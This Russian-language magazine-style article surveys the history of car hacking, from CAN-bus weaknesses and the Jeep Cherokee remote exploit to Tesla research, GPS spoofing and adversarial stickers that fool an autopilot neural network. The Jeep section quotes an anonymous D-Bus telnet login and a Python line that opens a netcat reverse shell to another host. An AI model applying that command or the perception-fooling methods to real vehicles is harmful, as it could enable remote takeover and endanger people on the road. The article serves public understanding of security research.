January 27, 2020

«Крепче за баранку держись!» Кто и как обманывает «умные» автомобили

Источник: t.me/Bureau121

Содержание статьи

  • Архитектура: CAN-шина, блоки ECU и прочее
  • Ученые вступают в бой
  • Повод задуматься
  • Крис Валасек и Чарли Миллер — легендарный дуэт
  • Печальная история о джипе и аудиосистеме
  • Подарок судьбы: безалаберный провайдер с дырявой сетью
  • Прикладная философия: безопасность в разработке и безопасность в использовании
  • Кто рулит «Теслой»?
  • Опасный лайфхак
  • Сенсоры: как роботы видят мир
  • GPS: алло, я где?
  • Китайская комната: о чем думает автопилот
  • Нейросеть не любит шума
  • Человеческое, слишком человеческое: ограничения технологии
  • Уровни автономности
  • Как перестать беспокоиться и полюбить «умную» машину

Архитектура: CAN-шина, блоки ECU и прочее

Начнем с архитектуры. Бортовой компьютер современного автомобиля на самом деле не существует как единое целое. Вместо него мы имеем совокупность электронных блоков управления (Electronic control unit, ECU), соединенных в сеть. С конца восьмидесятых годов и до сегодняшнего дня базовым стандартом этой сети остается так называемая CAN-шина. То есть куски витой пары, которым все блоки ECU передают сообщения одинакового формата.

На самом деле все, конечно, немного сложнее. Шина может быть не одна, а несколько — например, для более важных устройств с повышенным быстродействием и для второстепенных. В таком случае между шинами существует какой-нибудь «мост». А в своей платформе электромобилей MEB автоконцерн Volkswagen и вовсе отказывается от архитектуры на основе CAN-шины и будет использовать вместо нее бортовой Ethernet — и единую операционную систему на основе Android.

WWW

Подробнее о формате обмена данными и об устройстве CAN-шины можно прочесть в нашей недавней статье, в нашем мартовском номере 2015 года или в Википедии. А если хочется действительно подробно изучить вопрос, то в открытом доступе есть хорошая книга от большого специалиста.

Нам же пока важно то, что, каким бы «умным» ни был современный автомобиль, в основе лежит та же самая шина. А значит, по-прежнему актуальна ее принципиально неустранимая уязвимость: получив доступ к CAN (например, подключившись к диагностическому разъему или поставив на шину сниффер), мы получаем доступ ко всей передаваемой информации. Со всеми вытекающими последствиями.

И если мы сможем передать какому-то из блоков ECU свой сигнал, то он послушно выполнит команду. Если это будет блок управления кондиционером, еще не так страшно. А если блок управления тормозами или двигателем? В соответствии с принципом «ломать не строить» (или Garbage in, garbage out — «мусор на входе, мусор на выходе») одна-единственная неправильная команда, поступившая в момент напряженного обгона с выездом на встречную полосу, может привести к печальным последствиям и громким газетным заголовкам.

Впрочем, дела не настолько плохи. Производители не дураки и вполне в состоянии встроить элементы защиты в каждый конкретный блок ECU. Он может отказаться принимать команду, если в ней нет правильной контрольной суммы или если она будет не соответствовать каким-то дополнительным условиям. Очень часто притвориться помощником при парковке можно, только если машина едет задним ходом и не быстрее пяти километров в час, — при других условиях его сигналы будут проигнорированы.

Кроме того, сообщения в CAN-шине — это команды настолько низкоуровневые, что их можно сравнить с машинным кодом. Чтобы понять, что означает последовательность битов, придется долго читать технические инструкции производителя или проводить натурные эксперименты на настоящем автомобиле — или, на безрыбье, на отдельных блоках ECU.

Ученые вступают в бой

Получается интересная ситуация: на теоретическом уровне взломать автомобиль очень просто, но на практическом понадобится много скрупулезной подготовки. И как-то так вышло, что долгое время этим занимались в основном люди, держащиеся в тени и имеющие сугубо корыстные интересы — не получить контроль над электроникой автомашины, а получить саму автомашину в свои руки.

Только в 2010 году об этой теме заговорили всерьез. На посвященном безопасности симпозиуме Института инженеров электротехники и электроники (IEEE) был представлен доклад инженеров-компьютерщиков из университетов Сан-Диего и Вашингтона.

Они описали множество чрезвычайно интересных особенностей автомобилей как компьютерных систем. В основном эти особенности проистекали из того, что в индустрии много внимания уделяется безопасности при штатном использовании и чрезвычайных ситуациях, но мало — защищенности от целенаправленной атаки на электронные системы автомобиля.

Например, чтобы при аварии двери автомобиля не оказались запертыми, низкоприоритетная сеть, куда был включен блок управления центральным замком, имела «мостовую» связь с высокоприоритетной сетью, в которой были датчики состояния всего автомобиля и блоки разнообразных систем — «помощников» водителя. А продвинутые телематические системы собирали показания множества датчиков и по сотовой связи отправляли их в сервисные центры — чтобы автомобиль заранее мог подсказать владельцу, что скоро настанет пора заглянуть в автосервис, или самостоятельно звонил 911 в случае аварии. Более того, в ту же систему могло быть включено и противоугонное устройство — позволяющее на расстоянии заблокировать двигатель машины.

Что же именно сделала эта команда исследователей? Для начала они написали программу CARSHARK — гибкий инструмент для анализа и внедрения сообщений в CAN-шине. Дальше открываются широкие возможности. Не вдаваясь особенно глубоко в технические подробности, скажем только, что те блоки ECU, в которых была встроена аутентификация, были защищены всего лишь 16-битным ключом. Такую защиту получится обойти методом перебора за несколько дней. После этого можно, например, «перепрошить» ECU — и тогда уже твори что угодно.

Нанести существенный вред можно и просто устроив классическую DoS-атаку: перегруженная бессмысленными сообщениями система становилась неработоспособной. Но можно было и поиграть в героя фильмов про хакеров. Например, в качестве простой и убедительной демонстрации своих сил исследователи написали «демовирус самоуничтожения»: после его запуска машина выводила на спидометр обратный отсчет от шестидесяти, в такт уходящим секундам мигала поворотниками и сигналила, а потом намертво глушила двигатель и блокировала замки, оставляя на спидометре надпись PWNED.

Еще более коварный подход, который продемонстрировали исследователи, — загрузка вредоносного кода в оперативную память телематической системы (внутри которой была полноценная ОС на базе Unix). Они сделали так, чтобы код срабатывал по триггеру (например, разгону до определенной скорости) и перезагружал систему после срабатывания, удаляя себя оттуда. Идеальное преступление!

Но на этом исследователи не остановились. В следующем, 2011 году они представили новый доклад (PDF), в котором рассматривали уже не то, что может сделать с системой злоумышленник, получив к ней доступ, — а то, как именно он может этот доступ получить.

Повод задуматься

В 2011 году исследователи отмечали в качестве уже реального вектора атаки компьютеры, к которым в автосервисах подключают автомобили, — они используют Windows и часто нуждаются в доступе к интернету... А в качестве теоретического, возможного в будущем — оборудованные на зарядных станциях для электромобилей «умные» зарядки, по которым идет не только ток высокой силы, но и информация.

В отличие от их предыдущего весьма конкретного доклада этот читается скорее как захватывающее повествование о высотах и провалах инженерного искусства. Чего стоит только музыкальный трек в формате WMA, который на компьютере проигрывается как обычная музыка, но на автомобильном плеере отправляет вредоносные пакеты в CAN-шину. Или рассуждения о том, как именно можно подсоединиться к машине по Bluetooth или через телематическую систему с подключением к сотовой связи.

Иными словами, в этом докладе исследователи скорее указывали на потенциальные угрозы, напоминающие сценарии фильмов про хакеров, — с той оговоркой, что они действительно все это проделали в лабораторных условиях, а не просто предположили, что такие вещи могут произойти.

Крис Валасек и Чарли Миллер — легендарный дуэт

Что ж, после того как это сделала команда исследователей из двух крупных университетов, их достижения смогли повторить два парня в своем гараже — знакомься, Крис Валасек и Чарли Миллер.

Начали они с того, что дотошно повторили исследования своих предшественников — и написали куда более развернутый и полный доклад. Выводы, описанные в нем, в этой статье уже несколько раз упоминались: для успешного взлома автомобиля нужно много кропотливой предварительной работы, в которой есть свои подводные камни — например, если исследовать блоки ECU отдельно от автомобиля, на специальном испытательном стенде, то они могут (и будут!) вести себя не вполне так, как в рабочих условиях. Но если не бояться всей этой работы, то, когда получишь доступ к автомобилю, будет понятно, что делать, — и можно будет сделать очень многое.

Затем они изучили пару десятков конкретных моделей автомобилей, обращая внимание на детали их сетевой архитектуры — и особенно на возможные векторы удаленной атаки. Именно на этом этапе они выделили так называемые киберфизические компоненты — всевозможные помощники водителя вроде круиз-контроля или блока LKA (Lane Keep Assist, помощник удержания в полосе). Эти устройства одновременно служат самой привлекательной конечной целью для хакера — и важными вехами на пути к по-настоящему самоуправляемому автомобилю.

Валасек и Миллер обнаружили, что, с одной стороны, производители автомобилей используют разные компоненты и сетевую архитектуру, но, с другой стороны, во многих развлекательных системах применяются широко известные решения из обычной пользовательской электроники вплоть до веб-браузеров.

Печальная история о джипе и аудиосистеме

Но главным результатом этого этапа их трудов стало назначение цели для следующего шага. Они нашли потенциально интересную уязвимость в модели Jeep Cherokee 2014 года — и решили взяться за нее всерьез.

И их усилия были вознаграждены. В приборную панель джипа была встроена развлекательная система Harman Uconnect — компьютер с 32-битным процессором архитектуры ARM и операционной системой QNX (Unix-подобная коммерческая микроядерная ОС, часто используется в подобных встроенных системах). Она совмещала в себе аудиосистему, радиостанцию, навигатор, приложения — а еще умела раздавать Wi-Fi и имела модем 3G.

Сканирование открытых портов этой точки доступа показало, что в их числе был порт 6667. И что этот порт использовался системой межпроцессного взаимодействия D-Bus. И что для доступа к ней по этому порту был даже не нужен пароль.

telnet 192.168.5.1 6667

Trying 192.168.5.1...

Connected to 192.168.5.1.

Escape character is '^]'.

AUTH ANONYMOUS

OK 4943a53752f52f82a9ea4e6e00000001

BEGIN

После этого можно было просто запустить короткий скрипт на Python, чтобы открыть оболочку удаленного «рутового» доступа.

import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavTrailService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')

И, по словам самих хакеров, «дальше на этой штуке можно запускать какой угодно код».

Подарок судьбы: безалаберный провайдер с дырявой сетью

Но на этом удивительные открытия не заканчиваются. Порт 6667 был доступен для любого сетевого интерфейса, включая 3G-модем. Хакеры купили на eBay несколько «фемтосот» — миниатюрных точек доступа для сети Sprint Airave 2.0, зная, что в этих устройствах есть эксплоит, позволяющий подключаться к ним через Telnet. И да, когда машина попала в радиус действия их точки, хакеры смогли подключиться к автомобилю. Но и это было еще не все! Оказалось, что любые два устройства, подключенные к сети Sprint, могут связаться друг с другом в пределах США.

К этому моменту хакеры уже установили список IP-адресов, которые в этой сети выделялись под автомобили. Достаточно было просканировать этот диапазон — любой адрес в сети с открытым портом 6667 был доступом к интерфейсу D-Bus какого-то автомобиля в США. Вовсе не обязательно «Чероки». Исследователи обнаружили несколько моделей с открытым для доступа без аутентификации портом — и в этом месте своей работы они несколько раз повторяют, что ничего не внедряли ни в какой из найденных автомобилей, а просто обнаружили уязвимость.

Им не удалось установить, сколько именно машин они могли бы взломать, будь у них желание, — и предположили, что пару сотен тысяч. Но когда их исследование (PDF) было опубликовано, концерн Chrysler отозвал по причинам безопасности полтора миллиона автомобилей.

Прикладная философия: безопасность в разработке и безопасность в использовании

Крис Валасек и Чарли Миллер долго и упорно трудились и наконец добились своего — их взлом «Чероки» действительно стал сенсацией, после которой производители автомобилей наконец-то начали прислушиваться к экспертам по безопасности.

Хакеры сумели убедить представителей индустрии в том, что для компьютеризированных автомобилей важны все те же самые принципы безопасности, что и для остальной электроники: проектирование с упором на лучшие практики инфосека, тесная работа с хакерами-экспертами и, самое главное, понимание того, что «дыры» нужно не замалчивать, а оперативно исправлять патчами, желательно — централизованно распространяемыми и требующими от пользователя минимум усилий.

Например, какой-нибудь ленивый и нелюбопытный водитель джипа вполне мог пропустить предупреждения о проблеме, не доехать до сервисного центра и оставить свою машину уязвимой. А вот владелец «Теслы» уже получает обновления безопасности на свою машину так же, как на телефон или компьютер.

Кроме этого, дуэт хакеров отдельно отметил настораживающую тенденцию — чем больше в современном автомобиле «киберфизических компонентов», чем «умнее» они становятся, тем больше контроля над поведением автомобиля могло быть отдано отдельному блоку ECU. Такой блок оказывается высокоприоритетной и критичной целью одновременно. После проникновения в бортовую сеть автомобиля можно больше не ломать голову, как работают вместе разные блоки ECU, а сосредоточиться на том, который больше всего похож на «автопилот», и тем или иным способом обманывать конкретно его.

И если автомобиль становится все умнее, если он уже давно способен самостоятельно парковаться, удерживать скорость и полосу при движении по автомагистрали, готовиться к торможению, когда машина перед ним начинает сокращать дистанцию, — так в какой же момент он становится самоуправляемым? И насколько можно ему доверять?

Это не только технический, но и философский вопрос. Практика показывает, что современные автопроизводители одновременно расхваливают новые функции своих продуктов и строго рекомендуют водителям не снимать руки с руля, а глаза не отводить от дороги, чтобы сохранять возможность лично вмешаться в непредвиденную ситуацию. Увы, точно так же практика показывает, что водители часто игнорируют этот резонный совет.

Кто рулит «Теслой»?

Всякий раз, когда модная «Тесла» попадает в аварию, все громко обсуждают ее автопилот или батареи, но куда меньше внимания уделяют тому, что делал водитель перед аварией. В нескольких реальных случаях ответом было «ел бейглы», «смотрел кино» или просто «за час езды крепко держал руль не дольше пары минут». Раз за разом повторяется прискорбная история: при езде в крайнем левом ряду водитель перед «Теслой» видит какое-то препятствие, уходит в правый ряд... и «Тесла» начинает разгоняться, думая, что ей уступают дорогу. Конец немного предсказуем. В августе этого года такой инцидент произошел в Москве.

А случается такое из-за особенностей устройства и настроек сенсоров «Теслы». В ней не используется лидар (лазерный локатор) и предварительно загруженная карта местности — Илон Маск считает, что первый слишком дорогой, а вторая не дает желаемой гибкости.

«Тесла» вместо этого полагается на показания радара и камеры, данные с которых обрабатывает нейросеть. Но радар не очень хорош в распознавании неподвижных предметов, и, когда он и камеры дают противоположные результаты, механизм разрешения противоречий, бывает, выбирает неправильно. А водитель не готов быстро вмешаться и спасти ситуацию.

Опасный лайфхак

Некоторые эксперты утверждают, что дело не только в технических нюансах, а еще и в том, что Илон Маск рекламирует свое детище как полноценный автопилот. В инструкции к «Тесле» написано, что водитель должен быть всегда готов взяться за руль, — но в рекламных роликах сам Маск подчеркнуто нарушает это правило и тем самым подает водителям дурной и опасный пример.

Сенсоры: как роботы видят мир

Пример выше наглядно показывает, что степень «умности» машины зависит, во-первых, от количества и качества установленных на ней сенсоров, а во-вторых — от устройства системы, обрабатывающей сигналы от них. Но каждый сенсор — это тоже канал ввода данных, и у него могут быть свои уязвимости.

И здесь снова встает та же проблема: при разработке внимание уделяют в основном сложным случаям повседневного использования, а не противодействию целенаправленным помехам и атакам. И очень часто алгоритмы разрешения конфликтов противоречивых сигналов просто не рассчитаны на то, что их будут обманывать. Все как в старой доброй научной фантастике — роботы умные, но доверчивые.

Еще в 2013 году хакер Зоз Брукс выступил с докладом (PDF) на конференции DEF CON 21, в котором он очень подробно разобрал перспективы атак на автономные транспортные средства — включая самоуправляемые машины, самолеты-дроны и даже роботы-подлодки.

Он рассмотрел разные виды сенсоров и каналов управления таких устройств, подробно остановившись на сильных и слабых сторонах каждого, — и указал два общих для всех видов сенсоров пути атаки: глушение (jamming) и искажение сигнала (spoofing).

Доклад полон чрезвычайно любопытных подробностей. В нем упоминается написанное на арабском языке пособие по безопасности (вероятно, материалы какой-нибудь запрещенной законодательством РФ группировки), в котором советуют обманывать лидары с помощью отражателей. Упоминается возможность обмануть счетчик оборотов колес... подменив колеса — при размере колес, отличном от заданного, счетчик будет врать. Рассматриваются слабости решений с использованием карт — как предварительно загруженных, так и обновляемых в реальном времени.

GPS: алло, я где?

Еще в докладе Брукса много говорится об искажении сигнала GPS. На тот момент это была еще малоизученная, но уже горячая тема — ведь предположительно именно с использованием обмана GPS кибервойска Ирана сумели захватить секретный стелс-дрон США RQ-170 Sentinel.

В наши дни эту технологию применяют повсюду. В 2017 году двадцать кораблей в Черном море неподалеку от Геленджика наблюдали отклонение в показаниях GPS больше чем на 25 морских миль. Точно так же странные показания навигаторов отмечают порой водители, когда рядом проносится кортеж высокопоставленных лиц. Впрочем, в связи со стремительным удешевлением технологий SDR (Software Defined Radio, управляемые компьютером радиоприемник и радиопередатчик) такие возможности стали доступны и частным лицам.

Буквально недавно технологическая компания Regulus, занимающаяся решениями по защите спутниковой навигации от спуфинга, показала, что достаточно пары устройств и бюджета в 600 долларов, чтобы заставить Tesla Model 3 ехать совсем не туда, куда хочет водитель. Ложный сигнал заставляет автопилот думать, будто он идет по маршруту и уже пора сворачивать с магистрали, — что приводит машину на обочину или на встречную полосу. Впрочем, к таким атакам уязвимы любые устройства с GPS — дроны, невнимательные водители, доверяющие навигаторам, и даже игра Pokemon GO.

Китайская комната: о чем думает автопилот

Но это все разговор о сенсорах. В конечном счете с ними и так все понятно — против лома нет приема, в туманную или пыльную погоду камеры и лидар хуже видят, а еще их можно просто заклеить скотчем или подставить под «засветку» специальным излучателем, как делали исследователи из лаборатории Qihoo 360. А как обстоят дела у той части умного автомобиля, которая пользуется их показаниями? Можно ли обмануть ее?

Подробнее всех на этот вопрос отвечают китайские хакеры из лаборатории Keen Security Lab, спонсируемой мегакорпорацией Tencent. Судя по всему, они крайне внимательно изучили все перечисленные выше работы и в 2016 году решили попробовать свои силы в этой области. Но в отличие от Чарли Миллера и Криса Веласека, которые интересовались разными производителями и моделями автомобилей, эта группа с самого начала сосредоточилась исключительно на исследовании электромобилей «Тесла».

Их доклады очень сухие и полны технических подробностей, но, если вчитаться, становится понятно, что самое интересное в их исследованиях — это не внешние проявления «взлома», а объем и качество проделанной работы (а также сильное чувство дежавю — многие уязвимые места, которыми они пользовались, заставляют вспомнить работы Чарли Миллера и Криса Валасека и удивиться тому, что эти рецепты все еще актуальны).

Участники команды Keen Security Lab оказались настоящими мастерами реверс-инжиниринга. Для того чтобы в 2016 году показать открывающийся по их команде багажник «Теслы» или сложить ее зеркала, они прошли долгий путь — использование «подставной» точки доступа Wi-Fi и уязвимости в веб-браузере бортовой развлекательной системы были только началом.

Самое главное, что, проникнув через эту «дырку» в систему, они в итоге перепрограммировали специальный компонент Gateway (мост между разными частями бортовой сети) и таким образом получили доступ к CAN-шине. После этого они покопались в разных киберфизических компонентах машины — и в 2018 году выпустили новый доклад о том, как сумели получить «рутовый» доступ к автопилоту (попутно обойдя улучшенную после их прошлого доклада защиту). И вот уже после этого они смогли внимательно изучить его устройство — об этом был их самый последний доклад 2019 года (PDF).

За счет «рутового» доступа им удалось поработать с автопилотом в режиме отладки, исследовать, как именно он обрабатывает данные с камер и других сенсоров. В частности, они обнаружили, что сразу несколько задач: отслеживание объектов, построение карты обстановки и даже обнаружение дождя — на конечном этапе обрабатываются одной нейросетью.

Нейросеть не любит шума

То, что исследователи из Keen Security Lab сделали дальше, выглядит довольно скучно (машина включает дворники, когда нет дождя), но по сути своей это нечто на грани искусства и научной фантастики. Чтобы лучше разобраться, как работает автопилот в целом, они тренировались на той части нейросети, что распознает, идет ли дождь, и дает команду включить дворники. И добились результатов!

Изучив изображения, которые использует нейросеть дворников, они применили к ней метод «враждебных образцов». Поверх фотографии с камеры накладывали помехи, которые для человеческого глаза выглядят несущественно. Подав на вход нейросети эту фотографию, исследователи смогли заставить нейросеть обмануться — решить, что вероятность дождя высокая, и включить дворники. И это все — не с нейросетью, которую они программировали сами, а с коммерческим продуктом, в разработке которого они не участвовали.

После этого сотрудники Keen Security добились того, что для срабатывания эффекта достаточно было наложить шумы лишь на часть поля зрения камеры. А потом они перенесли этот эффект в реальный мир. Показывая картинку с шумом на экране телевизора, находящегося в поле зрения камер автомобиля, они заставляли дворники включиться. После этого они опробовали те же принципы уже на задаче распознавания дорожной разметки.

Выяснилось, что наклейки на дороге могут сбить автопилот с толку и он не заметит линию разметки, — но эти наклейки будут видны невооруженным глазом (исследователи отмечают, что нейросеть-автопилот натренирована в том числе и на примерах с полустертой или частично прикрытой разметкой). Тогда исследователи попробовали обратную задачу — с помощью других, куда меньших наклеек, они смогли заставить нейросеть увидеть линии разметки там, где их не было. Например — на перекрестке, где такая несуществующая разметка может вывести машину на полосу встречного движения.Исследователи утверждают, что хоть они и выяснили все это на автомобиле, к которому у них был неограниченный доступ, но сами приемы должны сработать и для автомобиля, программа которого никак не менялась. После такого взлома нейросети управление машиной с геймпада уже как-то не так впечатляет — но это китайские исследователи тоже проделывали со взломанной «Теслой».

Человеческое, слишком человеческое: ограничения технологии

В принципе, всего перечисленного уже достаточно для некоторых выводов. Но для полноты картины хотелось бы упомянуть еще несколько вещей.

Обрати внимание на то, что крупнейшие игроки на рынке беспилотных машин придерживаются решений с использованием карт и обкатывают свои продукты в конкретных городах (а то и вовсе на полигонах). Это потому, что так автопилоту куда легче соображать: карты могут включать в себя и расположение дорожных знаков, и места повышенной важности, и уж конечно — рельеф местности, известные преграды и просто схему движения. Не зря работу над российским аналогом гугловского Waymo ведет подразделение «Яндекса» — огромный массив карт и панорам будет здесь большим подспорьем. А ориентирование в абсолютно незнакомой местности пока остается уделом победителей конкурсов DARPA и амбициозных стартаперов.

Помни и о том, что за исключением отдельных рекламных образцов во многих беспилотных автомобилях за рулем всегда присутствует страхующий водитель. И производители не спешат разглашать статистику случаев, когда его вмешательство становится необходимо. Потому что это происходит чаще, чем им хотелось бы.

Уровни автономности

Американское Сообщество автомобильных инженеров (SAE) определяет степень автономности транспортного средства по шкале от 0 до 5. По этой шкале «Тесла» оценивается как представитель уровня 2 — автоматика управляет скоростью и направлением, но водитель должен быть готов вмешаться в любое мгновение. Кстати, обычный помощник при парковке тоже попадает в эту категорию.

Следующий, третий уровень подразумевает полный контроль автоматики за транспортным средством — но только в жестко ограниченных условиях, например на скоростной автомагистрали, где нет перекрестков.

Уровень 4 теоретически не требует присутствия человека за рулем — но тоже только в строго определенных условиях, вроде движения в пределах предварительно заданной области. Автомобили Waymo находятся на этом уровне.

Пятый уровень — когда человек окончательно превращается в пассажира, а машина способна на движение в неограниченных условиях — пока не достижим ни для одного из проектов.

Как перестать беспокоиться и полюбить «умную» машину

Так что же получается в итоге? Да то же самое, что и с многими другими представителями «интернета вещей». Чем выше сложность системы, тем больше у нее потенциально уязвимых мест, а самые защищенные элементы можно обойти, атаковав более уязвимые. Заимствуя готовые решения из смежных областей электроники, проектировщики забывают о том, что там могут быть свои проблемы. И наконец, человеческий фактор — бдительность притупляется, когда система многократно справляется с простыми задачами, и к ее ошибке в сложной ситуации никто не готов.

Будь бдителен и осторожен — за рулем и в интернете. Не ругай роботов понапрасну — они еще только учатся, — но и не доверяй им в критично и жизненно важных вещах на все сто.

А если после прочтения этой статьи тебе захотелось не пересесть в старые «Жигули» без всей этой электроники, а наоборот, разобраться в ней на собственном опыте — можешь попробовать обратить внимание на проект Джорджа Хоца comma.ai. Это автопилот для автомобиля с полностью открытым кодом и сравнительно дешевой электронной частью, которую можно легко установить во многие современные машины. Выйдет значительно дешевле «Теслы» и куда интереснее — к твоим услугам обширное сообщество энтузиастов, своя вики и подробный и интересный блог разработчиков. И даже не придется держать на руле руки.

Но смотреть на дорогу впереди и думать, что делаешь, все равно необходимо.

ПОДПИСАТЬСЯ - Бюро121